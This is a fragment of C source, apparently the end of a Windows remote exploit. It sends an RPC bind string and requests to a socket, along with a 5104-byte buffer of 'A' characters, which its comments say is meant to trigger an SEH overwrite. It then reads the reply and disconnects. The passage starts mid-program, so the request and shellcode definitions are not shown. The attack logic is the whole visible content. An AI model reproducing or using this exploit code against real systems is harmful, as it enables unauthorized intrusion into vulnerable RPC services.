send(s, bind_str, sizeof(bind_str), 0);
Sleep(1000);
printf("[*]Sending RPC Request Now!\n");
memset(buffer, '\x41', sizeof(buffer)); // fil the buffer to trigger seh
send(s, request_1, sizeof(request_1), 0);
send(s, buffer, 5104, 0); // fil the buffer to trigger seh
send(s, request_2, sizeof(request_2), 0);
Sleep(100);
memset(buffer, 0, sizeof(buffer));
ret = recv(s, buffer, sizeof(buffer)-1, 0);
//printf("recv: %s\n", buffer);
Disconnect(s);
return 0;
}